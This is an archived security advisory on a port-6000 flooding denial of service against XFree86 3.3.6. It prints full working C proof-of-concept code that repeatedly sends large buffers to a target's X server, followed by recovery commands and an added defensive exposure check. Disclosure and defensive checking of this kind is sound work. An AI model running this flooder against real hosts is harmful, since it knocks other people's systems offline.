COMMAND

    XFree

SYSTEMS AFFECTED

    XFree86 Version 3.3.6

PROBLEM

    The following is based on the Securax-SA-11 Security Advisory.
    When a large number of characters is sent to the X-windows daemon
    (port 6000), X-windows becomes laggy for a few seconds, so if one
    sends a lot of characters to it in a continuous loop, the server
    freezes. The only thing that works, as far as we know, to get X
    back to work is a reboot. [Not sure if the author even tried the
    Ctrl-Alt-BkSp kill stroke. If that fails, you can usually log in
    remotely and try "killall -TERM X" to give X a chance to shut
    down cleanly. And if *that* fails, a "killall -KILL X" followed
    by an "unset DISPLAY; X :0.0" should kill X rudely and reset the
    video hardware (kill the second X with the kill stroke mentioned
    before)].

    X-windows servers can be made laggy and can even be made to
    freeze. The code in this advisory is proof-of-concept code for
    this DoS.

    /* Linnuke.c (DoS)
     *
     * written by R00T-dude
     *
     * first of all, why the lame name
     * remember in the "good old days" the winnuke.c
     * well this gives about the same effect on linux
     * and probably any other form of unix that has
     * X-windows port (6000) open.
     *
     * greetz to: |ncubus, f0bic, F_F, nostalg1c, |vorlon, cicer0,
     * t-omicron, [tosh], demongirl, zym0t1c,segfau|t, so many others I forgot
     *
     */
    
    #include <stdio.h>
    #include <sys/socket.h>
    #include <netdb.h>
    #include <netinet/in.h>
    #include <string.h>
    
    main(int argc, char **argv)
    {
     int sock, conn, i, b;
     char buff[10000];
     struct sockaddr_in sin;
     struct hostent *hp;
    
     for(i=0; i<9000; i++)
     {
     strcat(buff, "\x41");  /* SHELLCODE ?? :) */
     }
     strcat(buff, "\n");
    
     if( (hp=gethostbyname(argv[1])) == NULL)
     {
      fprintf(stderr, "Gethostbyname() !"); exit(0);
     }
    
     for(b=0; b < b +1; b++)
     {
      sock = socket(AF_INET, SOCK_STREAM, 0);
      if (sock < 0)
      {
       fprintf(stderr, "Socket() !\n");  exit(sock);
      }
      sin.sin_family = AF_INET;
      sin.sin_port = htons(6000);
      sin.sin_addr.s_addr = *(unsigned long*)hp->h_addr_list[0];
    
      conn = connect(sock, (struct sockaddr *)&sin, sizeof(sin));
     if (conn < 0)
      {
       printf("Connect() !\n");
       /* don't exit(); or the loop will stop */
      }
    
      send(sock, buff, sizeof(buff), 0);
      close(sock);
     }
    }

SOLUTION

    Stock XFree86 4.0.1 appears not to be vulnerable.
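
    An exposure check to go with the above, added here as an example
    and not part of the original advisory: it scans a socket table in
    Linux /proc/net/tcp layout for X servers listening on port 6000 on
    a non-loopback address. It goes beyond the advisory by also
    covering displays :1 to :63 (ports 6001-6063); the sample rows,
    the function names and the little-endian assumption are ours.

```c
#include <stdio.h>
#include <string.h>
#define X_BASE_PORT   6000  /* display :0, the port named in the advisory */
#define X_MAX_DISPLAY 63    /* assumption: also cover displays :1..:63 */
#define TCP_LISTEN    0x0A  /* "st" column value for LISTEN */

/* Constructed sample, first columns of /proc/net/tcp (not from a real host). */
static const char SAMPLE[] =
    "  sl  local_address rem_address   st tx_queue rx_queue\n"
    "   0: 00000000:1770 00000000:0000 0A 00000000:00000000\n" /* *:6000 */
    "   1: 0100007F:1771 00000000:0000 0A 00000000:00000000\n" /* lo:6001 */
    "   2: 00000000:0016 00000000:0000 0A 00000000:00000000\n" /* *:22 */
    "   3: 0A00000A:1770 1400000A:C350 01 00000000:00000000\n" /* estab. */
    "   4: 0A00000A:1772 00000000:0000 0A 00000000:00000000\n"; /* :6002 */

/* Addresses are printed in host byte order; assumes little-endian (x86). */
static int is_loopback(unsigned addr) { return (addr & 0xFF) == 0x7F; }
/* Count LISTEN sockets on X display ports bound to non-loopback addresses. */
int count_exposed_x_listeners(const char *table)
{
    int exposed = 0;
    for (const char *line = table; line && *line; ) {
        unsigned addr, port, state;
        if (sscanf(line, " %*u: %8x:%4x %*8x:%*4x %2x",
                   &addr, &port, &state) == 3
            && state == TCP_LISTEN && !is_loopback(addr)
            && port >= X_BASE_PORT && port <= X_BASE_PORT + X_MAX_DISPLAY)
            exposed++;
        line = strchr(line, '\n');   /* advance to the next row */
        if (line) line++;
    }
    return exposed;
}

int main(int argc, char **argv)
{
    static char buf[1 << 16];
    const char *table = SAMPLE;
    if (argc > 1) {                  /* e.g. ./xlisten /proc/net/tcp */
        FILE *f = fopen(argv[1], "r");
        if (!f) { perror(argv[1]); return 2; }
        buf[fread(buf, 1, sizeof buf - 1, f)] = '\0';
        fclose(f);
        table = buf;
    }
    int n = count_exposed_x_listeners(table);
    printf("%d X listener(s) on non-loopback addresses\n", n);
    return n ? 1 : 0;
}
```

    IPv6 listeners are listed in /proc/net/tcp6, which this check
    does not parse.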